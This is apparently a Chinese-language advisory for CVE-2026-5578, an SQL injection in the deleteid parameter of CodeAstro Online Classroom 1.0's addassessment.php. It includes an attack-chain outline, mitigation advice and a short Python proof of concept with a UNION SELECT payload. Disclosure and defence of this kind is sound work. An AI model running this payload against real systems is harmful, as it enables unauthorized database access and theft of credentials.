IPBUF安全漏洞报告
English
CVE-2026-5578 CVSS 6.3 中危

CVE-2026-5578 CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-04-05
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-5578
漏洞类型
SQL注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
CodeAstro Online Classroom

相关标签

SQL注入CodeAstroWeb安全CVE-2026-5578远程利用

漏洞概述

CodeAstro Online Classroom 1.0版本被发现存在严重的安全漏洞,具体位于addassessment.php文件。由于组件参数处理机制存在缺陷,攻击者能够恶意操纵deleteid参数,从而触发SQL注入攻击。鉴于该漏洞允许远程利用且攻击复杂度低,潜在的攻击者可借此非法访问数据库,窃取敏感信息或破坏数据完整性。

技术细节

此漏洞的核心在于CodeAstro Online Classroom 1.0版本中的/OnlineClassroom/addassessment.php文件未能对用户提交的deleteid参数实施有效的安全过滤。在处理删除评估数据的逻辑时,程序直接将该参数拼接到SQL查询语句中,导致经典的SQL注入漏洞。攻击者无需高权限账户(PR:L)即可通过网络(AV:N)发起攻击。利用方式通常涉及在deleteid参数中注入SQL控制字符(如单引号、注释符)及恶意查询语句(如UNION SELECT)。成功利用后,攻击者可以绕过认证,读取数据库中的用户信息、密码哈希,甚至在特定条件下写入WebShell,进而控制服务器。

攻击链分析

STEP 1
侦察
攻击者识别并锁定运行CodeAstro Online Classroom 1.0的目标服务器。
STEP 2
漏洞利用
攻击者向/OnlineClassroom/addassessment.php发送特制的HTTP请求,在deleteid参数中注入恶意SQL代码。
STEP 3
执行
后端数据库接收并执行注入的恶意SQL语句,导致数据泄露或被篡改。
STEP 4
后果
攻击者获取数据库敏感信息,或利用数据库特性进一步渗透服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-ip/OnlineClassroom/addassessment.php" # SQL Injection Payload to extract database version payload = "1' UNION SELECT 1, version(), 3, 4, 5, 6, 7, 8, 9-- -" params = { "deleteid": payload } try: response = requests.get(target_url, params=params) if response.status_code == 200: print("Potential SQL Injection detected. Check response content.") print(response.text) except Exception as e: print(f"Error: {e}")

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施
建议立即检查系统版本并应用官方补丁。在无法立即升级的情况下,应在Web应用防火墙(WAF)中添加针对该路径SQL注入攻击的防护规则,或者临时修改代码逻辑,确保所有输入参数在进入数据库查询前经过严格的消毒处理。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表